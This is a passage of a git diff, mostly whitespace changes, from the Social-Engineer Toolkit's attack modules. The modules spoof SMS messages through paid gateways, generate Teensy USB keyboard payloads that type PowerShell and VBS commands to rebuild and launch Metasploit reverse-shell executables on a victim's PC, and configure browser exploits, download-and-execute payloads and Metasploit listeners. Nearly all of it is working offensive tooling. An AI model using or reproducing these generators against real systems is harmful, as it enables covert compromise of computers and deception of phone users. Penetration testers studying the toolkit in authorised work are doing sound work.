for line2 in fileopen:
match2=re.search("ORIGIN=", line2)
if match2:
origin=line2.replace('"', "")
origin=origin.split("=")
origin=origin[1]
match3=re.search("SUBJECT=", line2)
if match3:
subject=line2.replace('"', "")
subject=subject.split("=")
subject=subject[1]
match4=re.search("BODY=", line2)
if match4:
body=line2.replace('"', "")
body=body.replace(r'\n', " \n ")
body=body.split("=")
body=body[1]
if template_choice != '3' and service_option != '99':
#sohoOS service
if service_option == '1':
for to in phones:
send_sohoos_sms(to.rstrip(), origin.rstrip(), body.rstrip())
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
break;
if template_choice == '2':
try:
origin = raw_input(core.setprompt(["7"], "Source number phone"))
body = raw_input(core.setprompt(["7"], "Body of the message, hit return for a new line. Control+c when finished"))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body+=("\n")
body+=raw_input("Next line of the body: ")
except KeyboardInterrupt: break
except KeyboardInterrupt: pass
break;
#Lleida.net service
if service_option == '2':
user = raw_input(core.setprompt(["7"], "Your Lleida.net user"))
password = raw_input(core.setprompt(["7"], "Your Lleida.net password"))
email = raw_input(core.setprompt(["7"], "Email for the receipt (optional)"))
for to in phones:
send_lleidanet_sms(to.rstrip(), origin.rstrip(), body.rstrip(), user, password, email)
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
if template_choice == '99':
break;
#SMSGANG service
if service_option == '3':
pincode = raw_input(core.setprompt(["7"], "Your SMSGANG pincode"))
for to in phones:
send_smsgang_sms(to.rstrip(), origin.rstrip(), body.rstrip(), pincode)
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
if template_choice != '3':
while 1:
print("""
Service Selection
There are diferent services you can use for the SMS spoofing, select
your own.
1. SohoOS (buggy)
2. Lleida.net (pay)
3. SMSGANG (pay)
4. Android Emulator (need to install Android Emulator)
99. Cancel and return to SMS Spoofing Menu
""")
service_option = raw_input(core.setprompt(["7"], ""))
# exit
if service_option == '1':
break
if service_option == '2':
break
if service_option == '3':
break
if service_option == '4':
break
if service_option == '99':
break
if template_choice != '3' and service_option != '99':
#sohoOS service
if service_option == '1':
for to in phones:
send_sohoos_sms(to.rstrip(), origin.rstrip(), body.rstrip())
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
#Lleida.net service
if service_option == '2':
user = raw_input(core.setprompt(["7"], "Your Lleida.net user"))
password = raw_input(core.setprompt(["7"], "Your Lleida.net password"))
email = raw_input(core.setprompt(["7"], "Email for the receipt (optional)"))
for to in phones:
send_lleidanet_sms(to.rstrip(), origin.rstrip(), body.rstrip(), user, password, email)
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
#SMSGANG service
if service_option == '3':
pincode = raw_input(core.setprompt(["7"], "Your SMSGANG pincode"))
for to in phones:
send_smsgang_sms(to.rstrip(), origin.rstrip(), body.rstrip(), pincode)
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
#Andriod Emulator service
if service_option == '4':
for to in phones:
send_android_emu_sms(origin.rstrip(), body.rstrip())
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
#Andriod Emulator service
if service_option == '4':
for to in phones:
send_android_emu_sms(origin.rstrip(), body.rstrip())
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()

129
src/teensy/binary2teensy.py
View file

@ -1,6 +1,6 @@
#!/usr/bin/python
import binascii,base64,sys,os,random,string,subprocess,socket
from src.core.setcore import *
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
@ -62,7 +62,7 @@ This program will take shellexeccode which is converted to hexadecimal and
place it onto a victim machine through hex to binary conversion via powershell.
After the conversion takes place, Alphanumeric shellcode will then be injected
straight into memory and the stager created and shot back to you.
straight into memory and the stager created and shot back to you.
"""
# if we dont detect metasploit
@ -71,13 +71,13 @@ if not os.path.isfile(msf_path): sys.exit("\n[!] Your no gangster... Metasploit
# if we hit here we are good since msfpayload is installed
###################################################
# USER INPUT: SHOW PAYLOAD MENU 2 #
###################################################
###################################################
show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2)
payload=(raw_input(setprompt(["14"], "")))
if payload == "exit" :
exit_set()
if payload == "exit" :
exit_set()
# if its default then select meterpreter
if payload == "" : payload="2"
@ -88,47 +88,47 @@ payload=ms_payload(payload)
# if we're downloading and executing a file
url = ""
if payload == "windows/download_exec":
url = raw_input(setprompt(["6"], "The URL with the payload to download and execute"))
url = "set URL " + url
url = raw_input(setprompt(["6"], "The URL with the payload to download and execute"))
url = "set URL " + url
# try except for Keyboard Interrupts
try:
# grab port number
while 1:
port = raw_input(setprompt(["6"], "Port to listen on [443]"))
# assign port if enter is specified
if port == "": port = 443
try:
# try to grab integer port
port = int(port)
# if we aren't using a valid port
if port >= 65535:
# trigger exception
port = "dfds"
port = int(port)
break
# grab port number
while 1:
port = raw_input(setprompt(["6"], "Port to listen on [443]"))
# assign port if enter is specified
if port == "": port = 443
try:
# try to grab integer port
port = int(port)
# if we aren't using a valid port
if port >= 65535:
# trigger exception
port = "dfds"
port = int(port)
break
# if we bomb out then loop through again
except:
print " [!] Not a valid port number, try again."
# pass through
pass
# if we bomb out then loop through again
except:
print " [!] Not a valid port number, try again."
# pass through
pass
# except keyboardintterupts here
except KeyboardInterrupt:
print """
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
disabled.\n"""
print """
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
disabled.\n"""
sys.exit("\n[!] Control-C detected. Bombing out. Later Gangster...\n\n")
sys.exit("\n[!] Control-C detected. Bombing out. Later Gangster...\n\n")
print " [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim..."
# grab msfpayload alphanumeric shellcode to be inserted into shellexec
proc = subprocess.Popen("msfpayload %s EXITFUNC=thread LHOST=%s LPORT=%s %s R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX" % (payload,ipaddr,port,url), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read in stdout which will be our alphanumeric shellcode
alpha_payload = proc.stdout.read()
alpha_payload = proc.stdout.read()
# generate a random filename this is going to be needed to read 150 bytes in at a time
random_filename = generate_random_string(10,15)
# prep a file to write
@ -150,7 +150,7 @@ output_variable = "/* Teensy Hex to File Created by Josh Kelley (winfang) and Da
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode("$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename,random_filename))
########################################################################################################################################################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
@ -162,8 +162,8 @@ powershell_command = unicode("$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[stri
blank_command = ""
# loop through each character and insert null byte
for char in powershell_command:
# insert the nullbyte
blank_command += char + "\x00"
# insert the nullbyte
blank_command += char + "\x00"
# assign powershell command as the new one
powershell_command = blank_command
@ -172,29 +172,29 @@ powershell_command = base64.b64encode(powershell_command)
# while true
while 1:
# read 150 bytes in at a time
reading_hex = fileopen.read(space).rstrip()
# if its blank then break out of loop
if reading_hex == "": break
# write out counter and hex
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_hex)
# increase counter
counter = counter +1
# read 150 bytes in at a time
reading_hex = fileopen.read(space).rstrip()
# if its blank then break out of loop
if reading_hex == "": break
# write out counter and hex
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_hex)
# increase counter
counter = counter +1
# write out the rest
output_variable += "PROGMEM const char *exploit[] = {\n"
# while rev_counter doesn't equal regular counter
while rev_counter != counter:
output_variable+="RevShell_%s" % rev_counter
# incremenet counter
rev_counter = rev_counter + 1
if rev_counter == counter:
# if its equal that means we
# are done and need to append a };
output_variable+="};\n"
if rev_counter != counter:
# if we don't equal, keep going
output_variable+=",\n"
output_variable+="RevShell_%s" % rev_counter
# incremenet counter
rev_counter = rev_counter + 1
if rev_counter == counter:
# if its equal that means we
# are done and need to append a };
output_variable+="};\n"
if rev_counter != counter:
# if we don't equal, keep going
output_variable+=",\n"
# vbs filename
vbs = generate_random_string(10,15) + ".vbs"
@ -206,7 +206,7 @@ output_variable += ("""
char buffer[55];
int ledPin = 11;
void setup() {
void setup() {
pinMode(ledPin, OUTPUT);
}
void loop()
@ -228,7 +228,7 @@ void loop()
strcpy_P(buffer, (char*)pgm_read_word(&(exploit[i])));
Keyboard.print(buffer);
delay(80);
}
}
// ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST!
delay(5000);
CtrlS();
@ -277,12 +277,12 @@ Keyboard.send_now();
}
// Taken from IronGeek
void CommandAtRunBar(char *SomeCommand){
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
Keyboard.print(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
@ -323,6 +323,5 @@ subprocess.Popen("msfconsole -r src/program_junk/answer.txt", shell=True).wait()
print " [*] Housekeeping old files..."
# if our answer file is still there (which it should be), then remove it
if os.path.isfile("src/program_junk/answer.txt"):
# remove the old file, no longer used once we've exited
subprocess.Popen("rm src/program_junk/answer.txt", shell=True).wait()
# remove the old file, no longer used once we've exited
subprocess.Popen("rm src/program_junk/answer.txt", shell=True).wait()

82
src/teensy/powershell_shellcode.py
View file

@ -13,11 +13,11 @@ payload = raw_input("Select payload you want to delivery via the powershell - sh
if payload == "": payload = "2"
if payload == "1":
path = "src/program_junk/x86.powershell"
payload = "windows/meterpreter/reverse_tcp"
path = "src/program_junk/x86.powershell"
payload = "windows/meterpreter/reverse_tcp"
if payload == "2":
path = "src/program_junk/x64.powershell"
payload = "windows/x64/meterpreter/reverse_tcp"
path = "src/program_junk/x64.powershell"
payload = "windows/x64/meterpreter/reverse_tcp"
# create base metasploit payload to pass to powershell.prep
@ -38,21 +38,21 @@ output_variable = "#include <avr/pgmspace.h>\n"
counter = 0
while 1:
reading_encoded = fileopen.read(data_read).rstrip()
if reading_encoded == "": break
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_encoded)
counter = counter + 1
reading_encoded = fileopen.read(data_read).rstrip()
if reading_encoded == "": break
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_encoded)
counter = counter + 1
rev_counter = 0
output_variable += "PROGMEM const char *exploit[] = {\n"
while rev_counter != counter:
output_variable+="RevShell_%s" % rev_counter
rev_counter = rev_counter +1
if rev_counter == counter:
output_variable+="};\n"
if rev_counter != counter:
output_variable+=",\n"
output_variable+="RevShell_%s" % rev_counter
rev_counter = rev_counter +1
if rev_counter == counter:
output_variable+="};\n"
if rev_counter != counter:
output_variable+=",\n"
teensy = output_variable
@ -61,7 +61,7 @@ teensy+=("""
char buffer[55];
int ledPin = 11;
void setup() {
void setup() {
pinMode(ledPin, OUTPUT);
}
void loop()
@ -77,7 +77,7 @@ void loop()
strcpy_P(buffer, (char*)pgm_read_word(&(exploit[i])));
Keyboard.print(buffer);
delay(30);
}
}
// ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST!
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
@ -114,12 +114,12 @@ Keyboard.send_now();
}
// Taken from IronGeek
void CommandAtRunBar(char *SomeCommand){
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
Keyboard.print(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
@ -150,24 +150,24 @@ choice = yesno_prompt("0","Do you want to start a listener [yes/no]: ")
if choice == "YES":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
if check_options("PORT=") != 0:
port = check_options("PORT=")
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
else:
port = raw_input("Enter the port to connect back on: ")
if check_options("PORT=") != 0:
port = check_options("PORT=")
filewrite = file("src/program_junk/metasploit.answers", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload,ipaddr,port))
filewrite.close()
print "[*] Launching Metasploit...."
try:
child = pexpect.spawn("msfconsole -r src/program_junk/metasploit.answers")
child.interact()
except: pass
else:
port = raw_input("Enter the port to connect back on: ")
filewrite = file("src/program_junk/metasploit.answers", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload,ipaddr,port))
filewrite.close()
print "[*] Launching Metasploit...."
try:
child = pexpect.spawn("msfconsole -r src/program_junk/metasploit.answers")
child.interact()
except: pass

30
src/teensy/sd2teensy.py
View file

@ -30,7 +30,7 @@ you to have a Teensy device with a soldered USB device on it and place the
file that this tool outputs in order to successfully complete the task.
It works by reading natively off the SDCard into a buffer space thats then
written out through the keyboard.
written out through the keyboard.
"""
# if we hit here we are good since msfpayload is installed
@ -42,11 +42,11 @@ print """
# grab the path and filename from user
path = raw_input(setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while 1:
print_warning("Filename not found, try again")
path = raw_input(setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path): break
if not os.path.isfile(path):
while 1:
print_warning("Filename not found, try again")
path = raw_input(setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path): break
print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
print_status("Converting the executable to a hexadecimal form to be converted later...")
@ -138,7 +138,7 @@ void setup()
delay(10);
}
dataFile.close();
}
}
else {
Keyboard.println("error opening converts.txt");
}
@ -154,7 +154,7 @@ void setup()
delay(1000);
Keyboard.println("powershell -EncodedCommand %s");
// Tweak this delay. Larger files take longer to decode through powershell.
delay(10000);
delay(10000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %%TEMP%%\\\\%s");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%%TEMP%%\\\\%s\\" ^& Chr(34), 0 >> %%TEMP%%\\\\%s");
Keyboard.println("echo Set WshShell = Nothing >> %%TEMP%%\\\\%s");
@ -191,12 +191,12 @@ Keyboard.send_now();
}
// Taken from IronGeek
void CommandAtRunBar(char *SomeCommand){
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
Keyboard.print(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
@ -227,7 +227,7 @@ Instructions:
Copy the converts.txt file to the sdcard on the Teensy device. Use the teensy.pde normally
and use the Arduino IDE to place the latest code in there. Notice that you need to change
some code marked above based on the Teensy and the Teensy++ based on how you soldered the PIN's
on.
on.
Happy hacking.
"""

132
src/teensy/teensy.py
View file

@ -26,19 +26,19 @@ apache=0
apache_check=file("%s/config/set_config" % (definepath),"r").readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
line=line.rstrip()
# if apache is turned on get things ready
match=re.search("APACHE_SERVER=ON",line)
# if its on lets get apache ready
if match:
for line2 in apache_check:
# set the apache path here
match2=re.search("APACHE_DIRECTORY=", line2)
if match2:
line2=line2.rstrip()
apache_path=line2.replace("APACHE_DIRECTORY=","")
apache=1
# strip \r\n
line=line.rstrip()
# if apache is turned on get things ready
match=re.search("APACHE_SERVER=ON",line)
# if its on lets get apache ready
if match:
for line2 in apache_check:
# set the apache path here
match2=re.search("APACHE_DIRECTORY=", line2)
if match2:
line2=line2.rstrip()
apache_path=line2.replace("APACHE_DIRECTORY=","")
apache=1
# grab info from config file
@ -46,68 +46,68 @@ fileopen=file("src/program_junk/teensy", "r")
counter=0
payload_counter=0
for line in fileopen:
line=line.rstrip()
if counter == 0:
choice=str(line)
if counter == 1:
payload_counter=1
counter=counter+1
line=line.rstrip()
if counter == 0:
choice=str(line)
if counter == 1:
payload_counter=1
counter=counter+1
if choice != "14":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
if not os.path.isfile("src/program_junk/teensy"):
print_error("FATAL:Something went wrong, the Teensy config file was not created.")
exit_set()
print_error("FATAL:Something went wrong, the Teensy config file was not created.")
exit_set()
def writefile(filename,now):
fileopen=file("src/teensy/%s" % filename, "r")
filewrite=file("reports/teensy_%s.pde" % (now), "w")
for line in fileopen:
match=re.search("IPADDR",line)
if match:
line=line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
fileopen=file("src/teensy/%s" % filename, "r")
filewrite=file("reports/teensy_%s.pde" % (now), "w")
for line in fileopen:
match=re.search("IPADDR",line)
if match:
line=line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
filewrite.write(line)
filewrite.close()
filewrite.write(line)
filewrite.close()
# powershell downloader
if choice == "1":
writefile("powershell_down.pde", now)
writefile("powershell_down.pde", now)
# wscript downloader
if choice == "2":
writefile("wscript.pde",now)
writefile("wscript.pde",now)
# powershell reverse
if choice == "3":
writefile("powershell_reverse.pde",now)
writefile("powershell_reverse.pde",now)
# beef injector
if choice == "4":
writefile("beef.pde",now)
writefile("beef.pde",now)
# java applet downloader
if choice == "5":
writefile("java_applet.pde",now)
writefile("java_applet.pde",now)
# gnome wget downloader
if choice == "6":
writefile("gnome_wget.pde",now)
writefile("gnome_wget.pde",now)
if choice == "13":
writefile("peensy.pde",now)
payload_counter = 0
writefile("peensy.pde",now)
payload_counter = 0
# save our stuff here
print bcolors.BLUE + "\n[*] PDE file created. You can get it under 'reports/teensy_%s.pde' " % (now) +bcolors.ENDC
@ -117,22 +117,22 @@ print bcolors.RED + "\n[*] If your running into issues with VMWare Fusion and th
pause = raw_input("Press {return} to continue.")
if payload_counter == 1:
if apache == 0:
subprocess.Popen("mkdir src/program_junk/web_clone/;cp src/program_junk/msf.exe src/program_junk/web_clone/x.exe 1> /dev/null 2> /dev/null", shell=True).wait()
if operating_system != "windows":
child=pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp src/program_junk/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
if os.path.isfile("src/program_junk/meta_config"):
print bcolors.BLUE + "\n[*] Launching MSF Listener..."
print bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC
try:
if operating_system != "windows":
child1=pexpect.spawn("ruby %s/msfconsole -L -n -r src/program_junk/meta_config" % (msf_path))
child1.interact()
except:
if operating_system != "windows":
if apache == 0:
child.close()
child1.close()
if apache == 0:
subprocess.Popen("mkdir src/program_junk/web_clone/;cp src/program_junk/msf.exe src/program_junk/web_clone/x.exe 1> /dev/null 2> /dev/null", shell=True).wait()
if operating_system != "windows":
child=pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp src/program_junk/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
if os.path.isfile("src/program_junk/meta_config"):
print bcolors.BLUE + "\n[*] Launching MSF Listener..."
print bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC
try:
if operating_system != "windows":
child1=pexpect.spawn("ruby %s/msfconsole -L -n -r src/program_junk/meta_config" % (msf_path))
child1.interact()
except:
if operating_system != "windows":
if apache == 0:
child.close()
child1.close()

162
src/webattack/browser_exploits/gen_payload.py
View file

@ -14,21 +14,21 @@ port = ""
multiattack="off"
webdav_enabled="off"
if os.path.isfile("src/program_junk/multi_payload"):
multiattack="on"
# just need a simple filewrite to generate a file if webdav is enabled
# this is used for multi attack, it will write out file to program junk
# then a simple check will determine if webdav is enabled for the port
webdav_enabled="off"
webdav_write=file("src/program_junk/webdav_enabled","w")
multiattack="on"
# just need a simple filewrite to generate a file if webdav is enabled
# this is used for multi attack, it will write out file to program junk
# then a simple check will determine if webdav is enabled for the port
webdav_enabled="off"
webdav_write=file("src/program_junk/webdav_enabled","w")
fileopen=file("src/program_junk/multi_payload", "r")
for line in fileopen:
match=re.search("MAIN=",line)
if match:
port=line.replace("MAIN=","")
match2=re.search("MAINPAYLOAD=",line)
if match2:
exploit=line.replace("MAINPAYLOAD=",line)
fileopen=file("src/program_junk/multi_payload", "r")
for line in fileopen:
match=re.search("MAIN=",line)
if match:
port=line.replace("MAIN=","")
match2=re.search("MAINPAYLOAD=",line)
if match2:
exploit=line.replace("MAINPAYLOAD=",line)
# grab metasploit path
metasploit_iframe="8080"
@ -37,76 +37,76 @@ msf_path = meta_path()
configfile=file("%s/config/set_config" % (definepath),"r").readlines()
for line in configfile:
line=line.rstrip()
line=line.rstrip()
match4=re.search("METERPRETER_MULTI_SCRIPT=", line)
if match4:
meterpreter_multi=line.replace("METERPRETER_MULTI_SCRIPT=", "")
match4=re.search("METERPRETER_MULTI_SCRIPT=", line)
if match4:
meterpreter_multi=line.replace("METERPRETER_MULTI_SCRIPT=", "")
match5=re.search("METERPRETER_MULTI_COMMANDS=", line)
if match5:
meterpreter_multi_command=line.replace("METERPRETER_MULTI_COMMANDS=", "")
meterpreter_multi_command=meterpreter_multi_command.replace(";", "\n")
match5=re.search("METERPRETER_MULTI_COMMANDS=", line)
if match5:
meterpreter_multi_command=line.replace("METERPRETER_MULTI_COMMANDS=", "")
meterpreter_multi_command=meterpreter_multi_command.replace(";", "\n")
match6=re.search("METASPLOIT_IFRAME_PORT=", line)
if match6:
metasploit_iframe=line.replace("METASPLOIT_IFRAME_PORT=", "")
match6=re.search("METASPLOIT_IFRAME_PORT=", line)
if match6:
metasploit_iframe=line.replace("METASPLOIT_IFRAME_PORT=", "")
match7=re.search("AUTO_MIGRATE=", line)
if match7:
auto_migrate=line.replace("AUTO_MIGRATE=", "")
match7=re.search("AUTO_MIGRATE=", line)
if match7:
auto_migrate=line.replace("AUTO_MIGRATE=", "")
# grab attack vector
attack_vector=""
if os.path.isfile("src/program_junk/attack_vector"):
fileopen=file("src/program_junk/attack_vector")
for line in fileopen:
attack_vector=line.rstrip()
fileopen=file("src/program_junk/attack_vector")
for line in fileopen:
attack_vector=line.rstrip()
# open ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter your ipaddress: ")
update_options("IPADDR=" + ipaddr)
ipaddr = raw_input("Enter your ipaddress: ")
update_options("IPADDR=" + ipaddr)
debug_msg(me,"printing 'text.browser_exploits_menu'",5)
show_browserexploit_menu = create_menu(browser_exploits_text, browser_exploits_menu)
exploit=raw_input(setprompt(["4"], ""))
if exploit == '':
print "\n Defaulting to IE CSS Import Use After Free exploit....."
exploit=("1")
if exploit == '':
print "\n Defaulting to IE CSS Import Use After Free exploit....."
exploit=("1")
# dictionary = ms_module
exploit = ms_module(exploit)
choice1=""
if multiattack == "off":
if exploit != "windows/browser/java_codebase_trust":
show_payload_menu_2 = create_menu(payload_menu_2_text, payload_menu_2)
choice1=raw_input(setprompt(["4"], ""))
if multiattack == "off":
if exploit != "windows/browser/java_codebase_trust":
show_payload_menu_2 = create_menu(payload_menu_2_text, payload_menu_2)
choice1=raw_input(setprompt(["4"], ""))
if choice1 == '':choice1 ='2'
choice1 = ms_payload(choice1)
# if we are using the java exploit
if exploit == "exploit/windows/browser/java_codebase_trust" or exploit == "exploit/multi/browser/java_atomicreferencearray" or exploit == "exploit/multi/browser/java_verifier_field_access" or exploit == "exploit/multi/browser/java_jre17_exec" or exploit == "exploit/multi/browser/java_jre17_jmxbean" or exploit == "exploit/multi/browser/java_jre17_jmxbean_2":
print "[*] Selecting Java Meterpreter as payload since it is exploit specific."
choice1 = ("java/meterpreter/reverse_tcp")
if exploit == "exploit/windows/browser/java_codebase_trust" or exploit == "exploit/multi/browser/java_atomicreferencearray" or exploit == "exploit/multi/browser/java_verifier_field_access" or exploit == "exploit/multi/browser/java_jre17_exec" or exploit == "exploit/multi/browser/java_jre17_jmxbean" or exploit == "exploit/multi/browser/java_jre17_jmxbean_2":
print "[*] Selecting Java Meterpreter as payload since it is exploit specific."
choice1 = ("java/meterpreter/reverse_tcp")
if multiattack == "off":
port=raw_input(setprompt(["4"], "Port to use for the reverse [443]"))
if port == "": port = "443"
port=raw_input(setprompt(["4"], "Port to use for the reverse [443]"))
if port == "": port = "443"
# check to see if we need to use the multi attack vector in java
if not os.path.isfile("src/program_junk/multi_java"):
filewrite=file("src/program_junk/meta_config", "w")
filewrite=file("src/program_junk/meta_config", "w")
if os.path.isfile("src/program_junk/multi_java"):
filewrite=file("src/program_junk/meta_config", "a")
filewrite=file("src/program_junk/meta_config", "a")
filewrite.write("use "+exploit+"\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
@ -115,63 +115,63 @@ filewrite.write("set LPORT %s" % (port) + "\n")
#filewrite.write("set ENCODING shikata_ga_nai"+"\n")
filewrite.write("set URIPATH /"+"\n")
if choice1 == ("windows/download_exec"):
print "You selected the download and execute payload. Enter the URL to your executable."
print "Example would be http://172.16.32.129/malicious.exe"
set_url=raw_input(setprompt(["4"], "URL to the executable"))
filewrite.write("set URL %s" % (set_url) + "\n")
print "You selected the download and execute payload. Enter the URL to your executable."
print "Example would be http://172.16.32.129/malicious.exe"
set_url=raw_input(setprompt(["4"], "URL to the executable"))
filewrite.write("set URL %s" % (set_url) + "\n")
# if it isn't used for webdav then redirect to metasploit iframe configuration setting
if exploit != 'windows/browser/ms10_042_helpctr_xss_cmd_exec':
if exploit != 'windows/browser/ms10_046_shortcut_icon_dllloader':
if exploit != 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT %s" % (metasploit_iframe) + "\n")
if exploit != 'windows/browser/ms10_046_shortcut_icon_dllloader':
if exploit != 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT %s" % (metasploit_iframe) + "\n")
# if webdav is needed for exploit, change base port
if exploit == 'windows/browser/ms10_042_helpctr_xss_cmd_exec':
filewrite.write("set SRVPORT 80"+"\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
filewrite.write("set SRVPORT 80"+"\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
if exploit == 'windows/browser/ms10_046_shortcut_icon_dllloader':
filewrite.write("set SRVPORT 80"+"\n")
filewrite.write("set SRVPORT 80"+"\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
if exploit == 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT 80"+"\n")
filewrite.write("set SRVPORT 80"+"\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
extension=raw_input(setprompt(["4"], "Extension types for this exploit [all]"))
if extension == '':
filewrite.write("set EXTENSIONS p7c wab ppt pptx zip vsd docx grp snag wbcat eml odp pot ppsx htm html"+"\n")
else:
filewrite.write("set EXTENSIONS %s" % (extension) + "\n")
extension=raw_input(setprompt(["4"], "Extension types for this exploit [all]"))
if extension == '':
filewrite.write("set EXTENSIONS p7c wab ppt pptx zip vsd docx grp snag wbcat eml odp pot ppsx htm html"+"\n")
else:
filewrite.write("set EXTENSIONS %s" % (extension) + "\n")
filewrite.write("set ExitOnSession false\n")
# if we are using multiple meterpreter multiscripts
if meterpreter_multi == "ON":
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
